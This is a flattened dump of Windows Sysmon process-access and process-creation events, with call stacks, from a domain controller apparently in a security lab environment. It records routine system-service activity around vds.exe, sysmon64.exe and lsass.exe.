13:53:21.414{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001429Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.414{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001428Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.414{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001427Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.414{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001426Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.414{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001425Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.414{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001424Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.414{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001423Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.413{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001422Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.386{10ACEC4A-853E-5FCF-0A00-000000009101}852936C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001421Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.377{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001420Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.377{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001419Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.376{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001418Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.376{10ACEC4A-853E-5FCF-0A00-000000009101}8521136C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001417Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.362{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe10.0.14393.2608 (rs1_release.181024-1742)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=EC0D95737DE497BA0AD2223322B21280,SHA256=DE976B547872B0919E16D5A97902B95893AD5B76DE6A11BE5F874EADBCA49F93,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001416Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.372{10ACEC4A-853E-5FCF-0A00-000000009101}8521192C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001415Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.358{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001414Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.358{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001413Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.358{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001412Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.358{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001411Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3700-000000009101}3528C:\Windows\System32\vdsldr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001410Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001409Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001408Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001407Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.339{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3700-000000009101}3528C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001406Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.339{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001405Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 